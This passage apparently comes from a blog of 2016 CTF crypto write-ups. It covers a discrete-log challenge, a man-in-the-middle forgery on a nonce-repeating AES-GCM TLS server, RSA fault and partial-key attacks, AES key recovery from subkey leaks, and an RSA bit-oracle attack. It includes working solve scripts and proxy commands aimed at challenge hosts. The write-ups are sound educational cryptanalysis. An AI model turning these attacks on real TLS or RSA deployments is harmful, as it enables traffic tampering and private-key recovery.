q = 409 * 421 * 443 * 463 * 521 * 613 * 617 * 631 * 661 * 673 * 859 * 881 * 911 * 937 * 953 * 991 * 1021 * 1123 * 1171 * 1249 * 1321 * 1327 * 1361 * 1429 * 1531 * 1871 * 1873 * 2003 * 2081 * 2143 * 2311 * 2381 * 2731 * 2857 * 2861 * 3061 * 3169 * 3361 * 3433 * 3571 * 3697 * 4421 * 4621 * 5237 * 5281 * 6007 * 6121 * 6553 * 6733 * 7481 * 8009 * 8191 * 8581 * 8737 * 9241 * 9283 * 10711 * 12377 * 13729 * 14281 * 16831 * 17137 * 17681 * 18481 * 19891 * 20021 * 20593 * 21841 * 23563 * 24481 * 25741 * 26209 * 27847 * 29173 * 29921 * 30941 * 34273 * 36037 * 42841 * 43759 * 46411 * 48049 * 52361 * 53857 * 55441 * 63649 * 65521 * 72073 * 72931 * 74257 * 78541 * 79561 * 87517 * 92821 * 96097 * 97241 * 110881 * 116689 * 117811 * 131041 * 145861 * 148513 * 157081 * 180181 * 185641 * 209441 * 235621 * 269281 * 291721 * 314161 * 371281 * 388961 * 445537 * 471241 * 680681 * 700129 * 816817 * 1633633 * 8168161.

Solving the discrete log

After finding good $p$ and $q$, it is easy to solve the rest of the problem. First, since we can't bypass the test in 100% of the times, we have to do a few iterations. Then, if the tests pass, we need to solve the discrete logarithm problem. Luckily, Sage automatically factors the modulus (and all the group orders) and applies Pohlig-Hellman method. Since the factors are small, we don't need to supply our factorization to Sage, it finds it quickly automatically. We only have to ask Sage to compute $discrete\_log(v, g)$!

from sage.all import *
from sock import *

q = 59857999685097510058704903303340275550835640940514904342609260821117098340506319476802302889863926430165796687108736694628663794024203081690831548926936527743286188479060985861546093711311571900661759884274719541236402441770905441176260283697893506556009435089259190308034118717196693029323272007089714272903225216389846915864612112381878100108428287917605430965442572234711074146363466926780699151173555904751392997928289187479977403795442182731620805949932616667193358004913424246140299423521
p = 62524500763431441748481642690708441489776386892126187254070724779722504054292898512943722029745633023670685560530873804922086432332770562190282869379418979194485569141426416326281184435782910942683630763055432514713734358605440032411156894024431274583468338817956399407807741136790938228633811230955007519469063632837378284757301519562677312080310137628454021752642170957113443979650111115572728879157653822412120689975685302219422272533094042684647476957834486986793341

itr = 0
while 1:
    itr += 1
    print "Try #%d" % itr
    f = Sock("104.198.63.175 1729")
    f.send_line(str(q))
    f.send_line(str(p))
    ans = f.read_line()
    print `ans`
    if "Traceback" in ans:
        print ans
        print f.read_all()
        continue

    print "Primes are accepted! Getting discrete log"
    g, y = [int(ss[2:], 16) for ss in ans.split()]
    R = IntegerModRing(q)
    x = discrete_log(R(y), R(g))
    print "x", x
    print "y", y
    print "correct ?", pow(g, x, q) == y
    f.send_line(str(x))

    print f.read_all()
    break

After a few iterations, we get the flag: hxp{5cHr0eD1n9eR's_Pr1m3z}

TUM CTF 2016 – ndis (Crypto 300)

hellman — Sun, 02 Oct 2016 16:47:55 +0000

We have a HTTPS server and client talking to each other with you right in the middle! The client essentially executes

curl –cacert server.crt https://nsa.gov

with some magic to redirect the transmitted data to your socket, to which the server responds with a lovely German-language poem.

NOTE: There is nothing else hosted on the server; no need to brute-force filenames. Moreover, it may behave untypically due to hackiness.

Your task is to make the client receive a CTF-themed adaption of another German poem instead; to be precise, the HTTP response must consist of the following bytes:
5761 6c6c 6521 2057 616c 6c65 0a4d 616e  |Walle! Walle.Man|
6368 6520 5374 7265 636b 652c 0a44 6173  |che Strecke,.Das|
7320 7a75 6d20 5a77 6563 6b65 0a46 6c61  |s zum Zwecke.Fla|
6767 656e 2066 6c69 65c3 9f65 6e2c 0a55  |ggen flie..en,.U|
6e64 206d 6974 2072 6569 6368 656d 2c20  |nd mit reichem, |
766f 6c6c 656d 2053 6368 7761 6c6c 650a  |vollem Schwalle.|
5a75 2064 656e 2050 756e 6b74 656e 2073  |Zu den Punkten s|
6963 6820 6572 6769 65c3 9f65 6e2e 0a    |ich ergie..en..|
Upon receiving this response from the server, the client sends the flag to you through the same connection used to intercept the HTTPS traffic, so make sure not to overlook it!

Server: https://130.211.200.153:4433
Client: nc 130.211.200.153 9955

(If you just forward everything from one of those ports to the other, the connection succeeds and everything works fine. Then hack.)

NOTE: The setup for this challenge is not entirely trivial, so if you’re confused about unexpected things happening, please contact yyyyyyy on IRC. There is also a good chance something’s broken.

EPIC HINT published six hours before the end: The server’s ciphersuites have been carefully chosen to allow this attack. (Plus the server was patched a little bit.)

Summary: attacking nonce-repeating TLS server using AES-GCM cipher.

Here we have to implement a man-in-the-middle attack against custom TLS server. The ciphersuite used is ECDHE-ECDSA-AES128-GCM-SHA256 which is normally secure and all other ciphersuites are disabled. After the hint was given we concentrated on this ciphersuite and looked for possible attacks. AES-GCM is known to be very weak if the tag length is small. So googling for “tls aes gcm tag length” yielded the recent paper Nonce-Disrespecting Adversaries: Practical Forgery Attacks on GCM in TLS. It also matches the task name “ndis”.

So the idea of the attack is that when nonces are repeated (due to weak random, for example), then it is possible to recover authentication key from the GCM and make forgeries.

There is a proof-of-concept tool by the paper authors: https://github.com/nonce-disrespect/nonce-disrespect. In order to compile it, we need the latest NTL library.

The main tool there is gcmproxy. This proxy captures TLS packets and waits until nonces are repeated. Then the key is reconstructed and we can modify packets. Note that we can’t decrypt packets, only modify by xor! So one of the problems is to figure out which fragments contain which data to know what to xor and where. The hard part is that each time we debug a forgery, we have to wait until nonces collide on the server. Nonces were 1-byte values and they must to collide in the first ~5 packets.

After debugging it a lot, we arrived at the following modification to the forgery function:

func forgeRecord(rec1 *TLSRecord, key *GCMAuthKey) (rec2 *TLSRecord) {
	fragment := make([]byte, rec1.Header.FragmentLength)
	copy(fragment, rec1.Fragment)

	fmt.Println(rec1)

        # modify content-length: 256 -> 127
	if len(fragment) == 45 {
		payload, err := hex.DecodeString("030701")
		if err != nil {panic(err)}
		xor(fragment[16+8:], payload)
	}
        # modify poem
	if len(fragment) == 280 {
		payload, err := hex.DecodeString("3815180316014d38111f665837705c535e55581d6e7e780a171f0a5f2a290e0300000e07025420036f0c1f11657c4c070815114e4d091c1a45a5f0171a2665211a0b534d041b500145010c1816190c46191d18660a19543c5948040e1f036f003501540b45064f3c014e001b0e1d2a1c1d1707000d1d0b1d45acfd161a246574746f20686f726368740a6f74746f3a206d6f7073206d6f70730a6f74746f20686f6666740a0a6f74746f73206d6f7073206b6c6f7066740a6f74746f3a206b6f6d6d206d6f7073206b6f6d6d0a6f74746f73206d6f7073206b6f6d6d740a6f74746f73206d6f7073206b6f747a740a6f74746f3a206f676f74746f676f74740a")
		if err != nil {panic(err)}
		xor(fragment[8:], payload)
	}

	rec2 = &TLSRecord{rec1.Header, rec1.SeqNo, fragment}

        ...

Then we ran it as follows (a few times):

# run proxy
$ ./gcmproxy -l=127.0.0.1:5001 -r=130.211.200.153:4433 -w=127.0.0.1:5002
# connect client to proxy
$ socat -v tcp:130.211.200.153:9955 tcp:127.0.0.1:5001 2>&1
...
..............g..4Dp...:&f...[.> 2016/10/02 15:49:28.750616  length=28 from=529 to=556
hxp{NTw1C3:_n0t_ev3n_0nce.}

The flag: hxp{NTw1C3:_n0t_ev3n_0nce.}

PS: the challenge is quite obviously relying on using the PoC tool, because coding the full attack from scratch would take way more time (and is a bit boring).

CSAW Quals 2016 – Broken Box (Crypto 300 + 400)

hellman — Sun, 18 Sep 2016 22:19:04 +0000

I made a RSA signature box, but the hardware is too old that sometimes it returns me different answers… can you fix it for me?}

e = 0x10001

nc crypto.chal.csaw.io 8002

Summary: fault attack on RSA signatures, factoring using private exponent exposure.

In these two challenges we were given black-box access to a RSA signing (decryption oracle). We need to decrypt a given flag, but the oracle allows only to sign values in range 0-9999. Moreover, sometimes it gives different signatures for same values, because there are some faults due to “hardware errors” mentioned in the description.

Part 1

The simplest fault attacks on RSA are attacks on RSA-CRT, where by using gcd we can factor the modulus. However we tried to apply them and they failed. Therefore, it is probably not RSA-CRT scheme there.

By sampling signatures of, let’s say number 2, we can find that there are about 1000 unique values. It matches the size of the modulus in bits. Then it may be that the server flips some single bit of the secret exponent sometimes. There was a similar challenge already at this year’s Plaid CTF, but there we didn’t get enough bits.

Here’s how we can check our hypothesis: if we get $s = 2^{d \oplus 2^k} \mod{N}$ for some $k$, we can guess $k$ and check if $(s\times 2^{\pm 2^k})^e \mod N = 2$. If this condition holds, then we learn one bit from the secret exponent, depending on the sign of $\pm k$.

Indeed, the following script waits to collect all unknown bits and prints the flag for the first part:

import ast
from sock import Sock
from libnum import *

N = 172794691472052891606123026873804908828041669691609575879218839103312725575539274510146072314972595103514205266417760425399021924101213043476074946787797027000946594352073829975780001500365774553488470967261307428366461433441594196630494834260653022238045540839300190444686046016894356383749066966416917513737
E = 0x10001
sig_correct = 22611972523744021864587913335128267927131958989869436027132656215690137049354670157725347739806657939727131080334523442608301044203758495053729468914668456929675330095440863887793747492226635650004672037267053895026217814873840360359669071507380945368109861731705751166864109227011643600107409036145468092331
C = int(open("flag.enc").read())

f = Sock("crypto.chal.csaw.io 8002")
f.send_line("2")
f.read_until("no")

def sign(val):
    f.send_line("yes")
    f.send_line("%d" % val)
    sig, mod = map(int, f.read_until_re(r"signature:(\d+), N:(\d+)\s").groups())
    assert mod == N
    return sig

try:
    bits, vals = ast.literal_eval(open("dump").read())
except:
    bits, vals = {}, []
vals = set(vals)

print len(bits), "known bits"
num = 2

gs = {
    num * pow(num, (1 << e) * E, N) % N
    : e for e in xrange(0, 1030)
}
gsi = {
    (num * invmod(pow(num, (1 << e) * E, N), N)) % N
    : e for e in xrange(0, 1030)
}

while 1:
    if len(bits) >= 1024:
        print len(bits), "known", set(range(1025)) - set(bits), "unknown"
        d = sum(1 << e for e, b in bits.items() if b)
        print "Try:", `n2s(pow(C, d, N))`

    sig = sign(num)
    if sig in vals:
        continue
    vals.add(sig)
    test = pow(sig, E, N)
    if test in gs:
        bits[gs[test]] = 0
        print "bit[%d] = 0" % gs[test]
    if test in gsi:
        bits[gsi[test]] = 1
        print "bit[%d] = 1" % gsi[test]
    open("dump","w").write(`(bits, list(vals))`)
    print len(bits), "known bits"

The flag: flag{br0k3n_h4rdw4r3_l34d5_70_b17_fl1pp1n6}

Part 2

In the second part, the server has faults only in the 300 least significant bits of the secret exponent.

There is an LLL-based attack when more than quarter of the secret exponent bits are known. You can read more about these attacks in an awesome paper "Twenty Years of Attacks on the RSA Cryptosystem" by Dan Boneh (page 11):

$$ed - k\phi(N) = 1, ~\mbox{where}~ k < e$$ $$ed - k(N - p - q + 1) = 1$$ $$ed - k(N - p - q + 1) \equiv 1 \pmod {2^l}, ~\mbox{where}~ l = 300$$ $$ped - k(Np - p^2 - N + p) \equiv p \pmod {2^l}$$ We can guess $k < e$ and then we have a quadratic equation on the least significant bits of $p$. We can solve this quadratic equation bit-by-bit by solving it modulo 2, 4, 9, etc.

After finding 300 least significant bits of $p$, we can use Coppersmith method for finding small roots of polynomials modulo $p$: assume we know $t$ and $r$ such that $p = rx + t$. In our case $r$ is $2^{300}$. We multiply both sides by inverse of $r$ modulo $N$: $r^{-1}p = x + r^{-1}t \pmod{N}$. We see that x is a small root of polynomial $x + r^{-1}t$ modulo $p$ and so we can compute it with the Coppersmith’s method.

Here's the full code (Sage):

from sage.all import *

N = 123541066875660402939610015253549618669091153006444623444081648798612931426804474097249983622908131771026653322601466480170685973651622700515979315988600405563682920330486664845273165214922371767569956347920192959023447480720231820595590003596802409832935911909527048717061219934819426128006895966231433690709
E = 97
C = 96324328651790286788778856046571885085117129248440164819908629761899684992187199882096912386020351486347119102215930301618344267542238516817101594226031715106436981799725601978232124349967133056186019689358973953754021153934953745037828015077154740721029110650906574780619232691722849355713163780985059673037
L = 300

bits = [0, 2, 3, 5, 6, 7, 9, 10, 11, 13, 15, 16, 17, 18, 19, 22, 23, 25, 26, 27, 31, 32, 33, 35, 36, 39, 40, 41, 44, 45, 46, 48, 49, 52, 54, 55, 56, 60, 62, 63, 64, 67, 68, 72, 73, 74, 76, 80, 82, 83, 85, 88, 89, 91, 92, 93, 94, 98, 99, 101, 108, 109, 113, 115, 116, 117, 118, 119, 122, 128, 129, 131, 132, 133, 135, 142, 143, 144, 147, 152, 153, 156, 157, 160, 164, 166, 167, 168, 169, 170, 175, 177, 180, 181, 182, 185, 186, 189, 192, 193, 194, 195, 196, 197, 199, 202, 203, 205, 207, 208, 209, 211, 213, 215, 216, 217, 219, 220, 221, 222, 223, 225, 226, 227, 230, 233, 234, 235, 236, 238, 240, 242, 246, 247, 249, 252, 253, 255, 263, 264, 265, 266, 268, 271, 272, 273, 275, 276, 280, 285, 287, 288, 293, 294]
dlow = sum(2**e for e in bits)

x = PolynomialRing(Zmod(N), names='x').gen()

mod = 1 << L
imod = inverse_mod(mod, N)

def solve_quadratic_mod_power2(a, b, c, e):
    roots = {0}
    for cure in xrange(1, e + 1):
        roots2 = set()
        curmod = 1 << cure
        for xbit in xrange(2):
            for r in roots:
                v = r + (xbit << (cure - 1))
                if (a*v*v + b*v + c) % curmod == 0:
                    roots2.add(v)
        roots = roots2
    return roots


for k in xrange(1, E):
    a = k
    b = E*dlow - k*N - k - 1
    c = k*N
    for plow in solve_quadratic_mod_power2(a, b, c, L):
        print "k", k, "plow", plow
        roots = (x + plow * imod).small_roots(X=2**(215), beta=0.4)
        print "Roots", roots
        if roots:
            root = int(roots[0])
            kq = root + plow * imod
            q = gcd(N, kq)
            assert 1 < q < N, "Fail"
            p = N / q
            d = inverse_mod(E, (p - 1) * (q - 1))
            msg = pow(C, d, N)
            # convert to str
            h = hex(int(msg))[2:].rstrip("L")
            h = "0" * (len(h) % 2) + h
            print `h.decode("hex")`
            quit()

And for $k=53$ we get the flag: flag{n3v3r_l34k_4ny_51n6l3_b17_0f_pr1v473_k3y}.

Tokyo Westerns/MMA CTF 2016 – Backdoored Crypto System (Reverse+Crypto 400)

hellman — Mon, 05 Sep 2016 16:02:44 +0000

Get the flag.

bcs.7z

$ nc bcs.chal.ctf.westerns.tokyo 3971

Summary: recovering AES key from partial subkey leaks.

The challenge allows to encrypt any text and to encrypt the flag:

$ ./bcs 
> encrypt asd 
Encrypted: 6c4bb9114b4db65c2a0e7043f7693c2d
> decrypt asd
command not found
> flag
OK. I'll give you the flag.
Encrypted: 97ee6e2e2824906e9f4870553c7b4f49

1. Reverse-Engineering

Reversing the binary was pretty easy. The decompiled encryption function:

int __fastcall sub_400B20(const __m128i *a1, const __m128i *a2, __m128i *a3)
{
  ...
  v3 = a3;
  v4 = 0LL;
  v11 = _mm_loadu_si128(a2);
  _XMM3 = _mm_xor_si128(v11, _mm_loadu_si128(a1));
  for ( i = _mm_cvtsi32_si128(1u); ; i = _mm_cvtsi32_si128(dword_400EC0[v4]) )
  {
    __asm { aeskeygenassist xmm0, [rsp+58h+var_58], 0 }
    v8 = _mm_xor_si128(_mm_srli_si128(_XMM0, 12), v11);
    v9 = _mm_xor_si128(v8, _mm_slli_si128(v8, 4));
    v11 = _mm_xor_si128(_mm_xor_si128(_mm_shuffle_epi32(i, 0), _mm_slli_si128(v9, 8)), v9);
    if ( dword_6013AC != 322376503 )
      break;
    if ( v4 > 1 )
    {
      v12 = _XMM3;
      v14 = _mm_load_si128(&v11);
      v13 = v14;
      result = printf("%02x%02x", v11.m128i_u8[0], v14.m128i_u8[1], v11.m128i_i64[0]);
      _XMM3 = _mm_load_si128(&v12);
      break;
    }
LABEL_3:
    ++v4;
    __asm { aesenc  xmm3, [rsp+58h+var_58] }
    if ( v4 == 10 )
      goto LABEL_9;
  }
  if ( v4 != 9 )
    goto LABEL_3;
  __asm { aesenclast xmm3, [rsp+58h+var_58] }
LABEL_9:
  dword_6013AC = 0;
  *v3 = _XMM3;
  return result;
}

It uses AES-NI instructions so most likely it is AES. By debugging the binary and dumping the random key, we can easily verify that it is vanilla AES-128.

Interestingly, the global variable dword_6013AC triggers some leakage (recall the task name). To trigger it, we have to send command l34k1nf0 with value 322376503=0x13371337:

    v7 = memcmp(v13, "l34k1nf0 ", 9uLL) == 0;
    if ( v7 )
    {
      v6 = 0LL;
      dword_6013AC = strtol(&nptr, 0LL, 10);
    }

But what does it leak? It prints the first two bytes of some things, maybe subkeys or intermediate values. Let’s activate it:

$ gdb ./bcs 
gdb-peda$ b*0x400C7E  # calling encryption function
Breakpoint 1 at 0x400c7e

gdb-peda$ r
Starting program: /home/.../bcs 
> l34k1nf0 322376503
> encrypt 123
Breakpoint 1, 0x0000000000400c7e in ?? ()

gdb-peda$ x/16xc 0x6013b0   # the global array with random key
0x6013b0:   0x4a    0x93    0x64    0x71    0xf6    0x9d    0x55    0xb3
0x6013b8:   0xf 0x5f    0xc4    0xa5    0x80    0xec    0xef    0x8f

gdb-peda$ continue
Continuing.

ed22d3a6863bb017b97b6bb676dfd003631e849d4c109ee797708d576f4ac457

We now know that:

key = 0x4a,0x93,0x64,0x71,0xf6,0x9d,0x55,0xb3,0xf,0x5f,0xc4,0xa5,0x80,0xec,0xef,0x8f
leak = ed22d3a6863bb017b97b6bb676dfd003
enc("123") = 631e849d4c109ee797708d576f4ac457

Here’s the full expanded key (source code):

plaintext:   31 32 33 00 00 00 00 00 00 00 00 00 00 00 00 00
roundkey  0: 4a 93 64 71 f6 9d 55 b3 0f 5f c4 a5 80 ec ef 8f
roundkey  1: 85 4c 17 bc 73 d1 42 0f 7c 8e 86 aa fc 62 69 25
roundkey  2: 2d b5 28 0c 5e 64 6a 03 22 ea ec a9 de 88 85 8c
roundkey  3: ed 22 4c 11 b3 46 26 12 91 ac ca bb 4f 24 4f 37
roundkey  4: d3 a6 d6 95 60 e0 f0 87 f1 4c 3a 3c be 68 75 0b
roundkey  5: 86 3b fd 3b e6 db 0d bc 17 97 37 80 a9 ff 42 8b
roundkey  6: b0 17 c0 e8 56 cc cd 54 41 5b fa d4 e8 a4 b8 5f
roundkey  7: b9 7b 0f 73 ef b7 c2 27 ae ec 38 f3 46 48 80 ac
roundkey  8: 6b b6 9e 29 84 01 5c 0e 2a ed 64 fd 6c a5 e4 51
roundkey  9: 76 df 4f 79 f2 de 13 77 d8 33 77 8a b4 96 93 db
roundkey 10: d0 03 f6 f4 22 dd e5 83 fa ee 92 09 4e 78 01 d2
roundkey 11: 00 7f 43 db 22 a2 a6 58 d8 4c 34 51 96 34 35 83
roundkey 12: c0 e9 af 4b e2 4b 09 13 3a 07 3d 42 ac 33 08 c1
roundkey 13: a8 d9 d7 da 4a 92 de c9 70 95 e3 8b dc a6 eb 4a
roundkey 14: c1 30 01 5c 8b a2 df 95 fb 37 3c 1e 27 91 d7 54
roundkey 15: da 3e 21 90 51 9c fe 05 aa ab c2 1b 8d 3a 15 4f
ciphertext:  63 1e 84 9d 4c 10 9e e7 97 70 8d 57 6f 4a c4 57

Clearly, the leak contains first two bytes from subkeys for rounds 3-10 inclusive.

2. Attempt with z3

Let’s first try to use z3py to solve it. We can use code from Belluminar’s ahyes challenge solution as a basis:

from z3.z3 import *
from aes import AES

AES = AES()
s = Solver()

# make AES sbox z3-friendly
sbox = AES.sbox[::]
AES.sbox = Array("sbox", BitVecSort(8), BitVecSort(8))
for x in xrange(256):
    s.add(AES.sbox[x] == sbox[x])

# symbolical key expansion almost for free :)
master = [BitVec("master%d" % i, 8) for i in xrange(16)]
exp = AES.expandKey(master, 16, 11*16)

leak = "ed22d3a6863bb017b97b6bb676dfd003".decode("hex")
leaks = map(ord, leak)
for i in xrange(0, len(leaks), 2):
    a, b = leaks[i:i+2]
    s.add(exp[(3+i/2)*16+0] == a)
    s.add(exp[(3+i/2)*16+1] == b)

print s.check()
key = ""
model = s.model()
for m in master:
    key += chr(model[m].as_long())
print key.encode("hex")

Running the script and it immediately spits out the key: 4a0820f57cd5983afb70581b22ec324f. However, it is the wrong key (though few bytes match). By iterating over solutions we can see that there are many, around 2^32. For z3 it is a lot to iterate. So we have to figure out the structure of those solutions by ourselves.

3. AES-128 Key Schedule

The AES-128 key schedule works as follows: $subkey[0]=(a_0,b_0,c_0,d_0)$ is the master key, and all the consequent subkeys are obtained by applying iteratively the following function:

Here $a,b,c,d$ are 32-bit words (think of them as 4 bytes), $S$ applies four 8-bit S-Boxes in parallel and rotates the word by 8 bits. Here is what we know from the leak (“+” are known bytes, “?” – unknown):

Note that we have leakage for 8 subkeys and the situation from picture occurs only 7 times (both $a_i$ and $a_{i+1}$ are leaked). This number will reduce in a funny way. Now let’s compute other bytes:

the output of $S$ is equal to $a_i \oplus a_{i+1}$.
by inverting $S$ we learn two middle (remember rotation) bytes of $d_i$.

By applying the same thing at next two rounds, we obtain $d_{i+1}$ too. Note that these reduces the number of positions and now we only have 6 such positions.

By continuing these simple computations we obtain that for $i = 8$ we know 12/16 subkey bytes.

Here are all computations:

# d[i] = S^-1[a[i] ^ a[i+1]]
for i in reversed(xrange(3, 10)):
    known[i][13] = isbox[known[i+1][0] ^ known[i][0] ^ rcon[i+1]]
    known[i][14] = isbox[known[i+1][1] ^ known[i][1]]

# c[i+1] = d[i] ^ d[i+1]
for i in reversed(xrange(4, 10)):
    known[i][10] = known[i][14] ^ known[i-1][14]
    known[i][9] = known[i][13] ^ known[i-1][13]

# b[i+1] = c[i] ^ c[i+1]
for i in reversed(xrange(5, 10)):
    known[i][6] = known[i][10] ^ known[i-1][10]
    known[i][5] = known[i][9] ^ known[i-1][9]

# a[i+1] = b[i] ^ b[i+1]
for i in reversed(xrange(6, 10)):
    known[i][2] = known[i][6] ^ known[i-1][6]

# reusing same equations but for different bytes
# d[i] = S^-1[a[i] ^ a[i+1]]
for i in reversed(xrange(7, 10)):
    known[i-1][15] = isbox[known[i][2] ^ known[i-1][2]]

# c[i+1] = d[i] ^ d[i+1]
for i in reversed(xrange(7, 9)):
    known[i][11] = known[i][15] ^ known[i-1][15]

# b[i+1] = c[i] ^ c[i+1]
for i in reversed(xrange(8, 9)):
    known[i][7] = known[i][11] ^ known[i-1][11]

for i, k in enumerate(known):
    s = "".join("+" if x is not None else "?" for x in k)
    print "%2d" % i, s, "%d/16" % s.count("+")

The result:

 0 ???????????????? 0/16
 1 ???????????????? 0/16
 2 ???????????????? 0/16
 3 ++???????????++? 4/16
 4 ++???????++??++? 6/16
 5 ++???++??++??++? 8/16
 6 +++??++??++??+++ 10/16
 7 +++??++??+++?+++ 11/16
 8 +++??+++?+++?+++ 12/16
 9 +++??++??++??++? 9/16
10 ++?????????????? 2/16

It is quite interesting that in the end we arrived at 12/16 bytes known only for one subkey (#8). It happened because at each step the first and last subkeys did not have good neighbours. That is, if the backdoor would have leaked 2 bytes for subkeys 0-2, we would have known some almost full subkey. And it seems that with one round less leak the problem would become much harder.

Anyway, we can now bruteforce the 4 unknown bytes of the 8th subkey, revert the AES key schedule, compute the master key and verify it against the known encryption.

We again reuse the Belluminar’s ahyes implementation in C, here’s the main code (full code):

void undo_key_schedule(uint8_t subkeys[11][16]) {
    uint8_t tmp[4];
    for(int i = 8; i >= 1; i--) {
        FORN(j, 4) subkeys[i-1][12+j] = subkeys[i][12+j] ^ subkeys[i][8+j];
        FORN(j, 4) subkeys[i-1][8+j] = subkeys[i][8+j] ^ subkeys[i][4+j];
        FORN(j, 4) subkeys[i-1][4+j] = subkeys[i][4+j] ^ subkeys[i][j];
        tmp[0] = sbox[subkeys[i-1][12+1]] ^ fexp2(i-1);
        tmp[1] = sbox[subkeys[i-1][12+2]];
        tmp[2] = sbox[subkeys[i-1][12+3]];
        tmp[3] = sbox[subkeys[i-1][12+0]];
        FORN(j, 4) subkeys[i-1][j] = subkeys[i][j] ^ tmp[j];
    }
}

int main(int argc, char *argv[]) {
    uint8_t src[16] = "123";
    uint8_t dst[16] = {};
    uint8_t ciphertext[16] = "\xe2\xa7\x3d\xd0\xd1\x3f\x83\x54\x49\xeb\x3a\x5b\x65\xe7\x08\xb1";

    int subkey8[16] = {0xaa,0x42,0x29,-1,-1,0xa4,0x4c,0x86,-1,0xac,0x4a,0x7d,-1,0x81,0x4b,0x19};
    int indices[4] = {};
    int ni = 0;

    uint8_t subkeys[11][16];
    FORN(i, 16) {
        if (subkey8[i] == -1)
            indices[ni++] = i;
        subkeys[8][i] = subkey8[i];
    }

    for(uint64_t vals = (atoi(argv[1])*1ll) << 24; vals < 1ll << 32; vals++) {
        if ((vals & 0xffffff) == 0) fprintf(stderr, "%08llx\n", vals);

        FORN(i, 4) subkeys[8][indices[i]] = (vals >> (i*8)) & 0xff;
        undo_key_schedule(subkeys);
        encrypt(dst, src, 16, subkeys[0], 0, 10);
        if (!memcmp(dst, ciphertext, 16)) {
            printf("FOUND! %08llx\n", vals);
            FORN(i, 16)
                printf("%02x ", subkeys[0][i]);
            puts("");
        }
    }
    return 0;
}

In roughly an hour we obtain the correct master key and decrypt the flag: TWCTF{Why_doesn’t_he_leak_the_key_directly}

Tokyo Westerns/MMA CTF 2016 – Pinhole Attack (Crypto 500)

hellman — Mon, 05 Sep 2016 16:00:52 +0000

Decrypt the cipher text with a pinhole.

$ nc cry1.chal.ctf.westerns.tokyo 23464
pinhole.7z

Summary: attacking RSA using decryption oracle leaking 2 consecutive bits in the middle.

In this challenge we are given an access to a decryption oracle, which leaks only 2 consecutive bits in the middle of the decrypted plaintext:

b = size(key.n) // 2

def run(fin, fout):
    alarm(1200)
    try:
        while True:
            line = fin.readline()[:4+size(key.n)//4]
            ciphertext = int(line, 16) # Note: input is HEX
            m = key.decrypt(ciphertext)
            fout.write(str((m >> b) & 3) + "\n")
            fout.flush()
    except:
        pass

We are also given an encrypted flag and our goal is to decrypt it.

Recall that plain RSA is multiplicatively homomorphic: we can multiply ciphertext by $r^e$ and the plaintext is the multiplied by $r$: we need only the public key to do it.

Let’s multiply the ciphertext by $2^{-e}$. Assume that the oracle gives bits $(a,b)$ for the ciphertext $C$ and $(c,d)$ for the ciphertext $2^{-e}C\pmod{N}$. Then there are two cases:

If the message $M$ is even, then dividing by 2 is equivalent to shifting it right by one bit.
Otherwise, $M$ is transformed into $(M + N) / 2$.

In the first case due to the shift we must have $d = a$. In the second case, depending on the carries it can be anything. However, if $d \ne a$ then we learn for sure the the LSB of $M$ is odd. As a result we get this probabilistic LSB oracle:

$a,b = oracle(C);$
$c,d = oracle(2^{-e}C);$
If $d \ne a$ then $LSB(M) = 1.$

How can we use it?

Let’s assume that we confirm that $LSB(M) = 1$. Otherwise we can “randomize” the ciphertext by multiplying it by some $r^e$ (we will be able to remove this constant after we fully decrypt the message) until we get the condition hold.

Remember that we can multiply the message by any number $d$, what do we learn from the oracle when it happens that $LSB(dM \mod{N}) = 1$? Let $k = floor(dM/N)$, then:

$$dM – kN \equiv 1 \pmod{2}.$$

We know that $N$ is odd and $M$ is odd, hence

$$k = d + 1 \pmod{2}.$$

We also know $d$, therefore we learn parity of $k$. If $d$ is small, we can enumerate all possible $k$, since $k < d$. Each candidate $k_0$ gives us a possible range for the message (from the definition of $k$): $$\frac{kN}{d} \le M < \frac{(k+1)N}{d}.$$ Example: assume that $LSB(5M \mod{N}) = 1$. Then $k$ is even and is less than $5$. The possible candidates are $0,2,4$. That is, the message $M$ must be in one of the three intervals:

$$0 \le M < N/5, \text{or}$$ $$2N/5 \le M < 3N/5, \text{or}$$ $$4N/5 \le M < 5N/5.$$ So we have reduced the possible message space. Note however that these intervals have size at least $N/d$. If we want to reduce the message space to only few messages, we would need large $d$. Then we will not be able to check all candidates for $k$!

But there is a nice trick, we can deduce the possible intervals for $k$ for given $d$ from obtained previously intervals for $M$! I learnt this trick from this article, explaining the Bleichenbacher’s attack (see section “Narrowing the initial interval”). Indeed, if $l \le M \le r$ then

$floor(\frac{dl}{N}) \le k \le floor(\frac{dr}{N}).$

To sum up, here is the algorithm structure:

Set possible range for $M = [0,N-1]$.
Set small $d$.
Loop:

If $oracle_{LSB}(dM \mod{N}) = ?$ then try another $d$.
For each possible interval for $M$:

Deduce possible range for $k$.
Iterate over all $k$ with parity different from $d % 2$ and obtain union of possible intervals for $M$.
Intersect these intervals with the previous intervals for $M$.

Increase $d$, for example double it.

There is a small detail. If we keep doubling $d$, then number of intervals for $M$ grows quickly and makes the algorithm slower. To keep the number of intervals small, we can multiply $d$ by let’s say 1.5 instead of 2 when there are too many intervals.

Here’s python code (works locally by simulating oracle using the secret key):

from libnum import invmod, len_in_bits
from libnum.ranges import Ranges # added recently

from Crypto.PublicKey import RSA

with open("secretkey.pem", "r") as f:
    key = RSA.importKey(f.read())
with open("publickey.pem", "r") as f:
    pkey = RSA.importKey(f.read())

nmid = len_in_bits(pkey.n) // 2

C = int(open("ciphertext").read())
n = pkey.n
e = pkey.e
i2 = pow(invmod(2, n), e, n)

def oracle(c):
    m = key.decrypt(c)
    v = (m >> nmid) & 3
    a = v >> 1
    b = v & 1
    return a, b

def oracle_lsb(ct):
    a, b = oracle(ct)
    c, d = oracle( (i2 * ct) % n )
    if d != a:
        return True
    return None

rng = Ranges((0, n - 1))
assert oracle_lsb(C), "need blinding..."
print "Good"

div = 2
ntotal = 0
ngood = 0
while 1:
    ntotal += 1
    div %= n
    C2 = (pow(div, e, n) * C) % n
    if not oracle_lsb(C2):
        div += 1
        continue

    ngood += 1
    cur = Ranges()
    for ml, mr in rng._segments:
        kl = ml * div / n
        kr = mr * div / n
        # ensure correct parity
        if kl % 2 == div % 2:
            kl += 1
        k = kl
        while k <= kr:
            l = k * n / div
            r = (k + 1) * n / div
            cur = cur | Ranges((l, r))
            k += 2

    rng = rng & cur
    print "#%d/%d" % (ngood, ntotal), "good", div, "unknown bits:", len_in_bits(rng.len), "num segments", len(rng._segments)

    if rng.len <= 100:
        print "Few candidates left, breaking"
        break

    # heuristic to keep fewer intervals for M
    if len(rng._segments) <= 10:
        div = 2*div
    else:
        div = div + (div / 2) + (div / 4)

M = int(open("message").read())
print "Message in the %d candidates left?" % rng.len, M in rng

